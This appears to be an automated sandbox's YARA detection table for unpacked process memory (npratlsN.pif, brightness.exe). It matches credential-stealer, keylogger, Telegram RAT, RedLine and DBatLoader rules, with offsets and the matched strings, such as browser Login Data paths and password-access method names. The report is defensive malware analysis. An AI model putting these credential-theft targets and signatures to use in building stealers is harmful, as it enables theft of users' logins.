14.2.npratlsN.pif.23cc0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.23cc0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.23cc0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
14.2.npratlsN.pif.23cc0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.23cc0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
14.2.npratlsN.pif.242f0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.242f0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.242f0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.242f0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2e310ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2e310ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2e310ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2e310ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2e310ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2dd40000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
10.2.npratlsN.pif.2dd40000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
16.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.npratlsN.pif.214f9a06.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.214f9a06.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.npratlsN.pif.214f9a06.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.214f9a06.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.214f9a06.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2dd40ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2dd40ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2dd40ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
16.2.npratlsN.pif.2e310000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2e310000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2e310000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2e310000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2e310000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
16.2.npratlsN.pif.2e310000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b489a06.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2b489a06.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
14.2.npratlsN.pif.242f0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
14.2.npratlsN.pif.242f0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.242f0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
4.2.brightness.exe.2274618.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
16.2.npratlsN.pif.2ea90000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2ea90000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2ea90000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2ea90000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2ea90000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
16.2.npratlsN.pif.2ea90000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b48a8ee.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.brightness.exe.21890948.10.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0xafb40:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x92b10:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x93190:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0xb181a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0xb1460:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0xb0918:$s6: constructor or from DllMain.
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2e310ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.npratlsN.pif.29aec7e8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.3.npratlsN.pif.29aec7e8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.3.npratlsN.pif.29aec7e8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.3.npratlsN.pif.29aec7e8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.npratlsN.pif.29aec7e8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
10.3.npratlsN.pif.29aec7e8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
10.3.npratlsN.pif.29aec7e8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2dd40000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
14.2.npratlsN.pif.23cc0ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
14.2.npratlsN.pif.23cc0ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2dd40000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2dd40000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2dd40000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2dd40000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2dd40000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
10.2.npratlsN.pif.2dd40000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.23cc0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.23cc0000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.npratlsN.pif.23cc0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.23cc0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2bb89a06.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2bb89a06.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2bb89a06.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2bb89a06.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2bb89a06.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
16.2.npratlsN.pif.2bb89a06.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2bb89a06.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2dd40ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
16.2.npratlsN.pif.2e310ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2e310ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
16.2.npratlsN.pif.2bb89a06.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
10.2.npratlsN.pif.2e490000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
14.2.npratlsN.pif.214f9a06.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
14.2.npratlsN.pif.214f9a06.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b48a8ee.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
14.2.npratlsN.pif.214f9a06.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
